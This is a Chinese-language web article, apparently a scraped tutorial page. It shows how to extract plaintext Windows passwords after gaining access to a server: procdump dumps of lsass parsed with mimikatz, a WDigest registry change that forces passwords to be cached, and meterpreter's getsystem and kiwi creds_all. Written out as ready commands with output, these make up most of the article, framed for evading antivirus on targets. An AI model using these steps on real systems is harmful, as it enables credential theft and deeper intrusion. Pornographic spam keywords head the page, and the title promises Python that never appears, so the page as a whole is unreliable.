欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

python簡(jiǎn)單直接獲取windows明文密碼操作技巧

 更新時(shí)間:2021年10月14日 16:21:46   作者:Bypass--  
在實(shí)戰(zhàn)中,拿到一臺(tái)Windows服務(wù)器權(quán)限,如果可以直接獲取Windows明文密碼的話,就可以更容易深入挖掘。本文分享幾個(gè)獲取Windows明文密碼的技巧,簡(jiǎn)單直接且有效

01、Procdump+Mimikatz

利用procdump+Mimikatz 繞過(guò)殺軟獲取Windows明文密碼。

(1)工具準(zhǔn)備:

ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz:

https://github.com/gentilkiwi/mimikatz/

(2)Windows Server 2008 R2提取明文密碼

在目標(biāo)機(jī)器上生成存儲(chǔ)文件:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

28ff828ad9dc41f836b56f21c0539199.png

將lsass.dmp復(fù)制到本地,使用mimikatz 一行命令將結(jié)果輸出到文本。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt

如圖:成功從內(nèi)存中提取明文密碼。

313f61ce69afdb6dd81d5799061cc2b3.png

02、Window 2012 R2抓取密碼

在Windows2012系統(tǒng)及以上的系統(tǒng),默認(rèn)在內(nèi)存緩存中禁止保存明文密碼的。攻擊者可以通過(guò)修改注冊(cè)表的方式抓取明文,需要用戶(hù)重新登錄后才能成功抓取。

(1)修改注冊(cè)表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2)用戶(hù)administrator注銷(xiāo)后重新登錄,成功抓取到明文信息。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

6bf5bf93d637794f12177436ca146737.png

03、MSF kiwi模塊

使用kiwi模塊需要system權(quán)限,所以我們?cè)谑褂迷撃K之前需要將當(dāng)前MSF中的shell提升為system。

提到system有兩個(gè)方法,一是當(dāng)前的權(quán)限是administrator用戶(hù),二是利用其它手段先提權(quán)到administrator用戶(hù)。然后administrator用戶(hù)可以直接getsystem到system權(quán)限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加載kiwi模塊:

load kiwi

列舉系統(tǒng)中的明文密碼:

creds_all

cdc6292a7aaba1f4ba86e7b526fe55ae.png

以上就是python簡(jiǎn)單直接獲取windows明文密碼操作技巧的詳細(xì)內(nèi)容,更多關(guān)于python獲取windows明文密碼的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

最新評(píng)論